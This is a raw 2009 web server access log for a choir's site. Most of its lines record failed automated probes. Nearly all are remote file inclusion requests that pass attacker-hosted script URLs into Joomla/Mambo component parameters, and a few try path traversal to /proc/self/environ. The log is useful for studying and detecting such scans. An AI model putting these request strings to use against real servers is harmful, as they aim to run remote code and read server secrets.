217.147.29.190 - - [04/Jul/2009:11:25:49 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:08 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:08 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:08 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:26:09 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:26:09 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:26:09 -0700] "GET /logs/access.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:09 -0700] "GET /components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:09 -0700] "GET /logs//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:26:09 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:26 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:26 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:27 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:27:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:27:33 -0700] "GET /logs/access_090318.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:27:39 -0700] "GET /logs/access_090318.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:28:42 -0700] "GET /logs/access_090626.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:28:42 -0700] "GET /logs/access_090626.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.201.180.130 - - [04/Jul/2009:11:29:38 -0700] "GET /logs/access_090414.log%20%20/e404.php?DOCUMENT_ROOT=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:29:43 -0700] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:29:53 -0700] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:30:12 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:30:13 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:31:20 -0700] "GET /logs/access_090626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:31:34 -0700] "GET /logs/access_090626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.201.180.130 - - [04/Jul/2009:11:31:42 -0700] "GET /logs/access_090603.log%20%20/e404.php?DOCUMENT_ROOT=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:33:40 -0700] "GET /logs/access.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:33:44 -0700] "GET /main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:33:44 -0700] "GET /logs/access_090517.log%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:33:44 -0700] "GET /logs//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:33:44 -0700] "GET /logs/access.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:48 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:49 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:33:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:34:01 -0700] "GET /logs/access_090528.log%20%20//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:34:05 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:34:05 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:34:05 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:11:34:06 -0700] "GET /logs/access_090629.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
59.178.62.231 - - [04/Jul/2009:11:34:15 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.co.in/search?hl=en&q=intitle%3A%22index.of%22+indian+xxx&btnG=Search&meta=&aq=f&oq=" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "www.americanboyschoir.com"
59.178.62.231 - - [04/Jul/2009:11:34:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.americanboyschoir.com/xxx/" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:11:34:37 -0700] "GET /logs/access_090629.log//components/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:01 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:01 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:01 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:35:03 -0700] "GET /logs/access.log///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=17&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:35:03 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=17&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:35:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=17&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:18 -0700] "GET /logs/access_090626.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:48 -0700] "GET /logs/access_090528.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:48 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:35:48 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:36:06 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:37:20 -0700] "GET /logs/access.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=17&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:38:30 -0700] "GET /logs/access_090629.log//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:46 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:46 -0700] "GET /logs/access_090622.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:46 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:53 -0700] "GET /logs/access_090622.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:53 -0700] "GET //administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:38:53 -0700] "GET /logs///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:11:40:58 -0700] "GET /logs/access.log//main.php?sayfa=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:43 -0700] "GET /logs/access_090502.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:55 -0700] "GET /logs/access_090502.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:41:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:06 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:06 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:09 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:43:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:45:09 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:45:10 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:45:26 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.237.238.234 - - [04/Jul/2009:11:45:26 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:45:28 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:45:30 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:46:08 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:11:46:09 -0700] "GET /logs/access_090414.log%20%20///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
207.210.89.18 - - [04/Jul/2009:11:46:38 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:46:54 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:11:47:41 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:48:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:11:48:09 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:11:48:10 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:48:46 -0700] "GET /config.php?path_to_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:48:46 -0700] "GET /logs//config.php?path_to_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:48:46 -0700] "GET /logs/access_090410.log//config.php?path_to_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:49:28 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:49:28 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:49:28 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:50:27 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:50:27 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:11:50:28 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:03 -0700] "GET /logs/access_090517.log//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
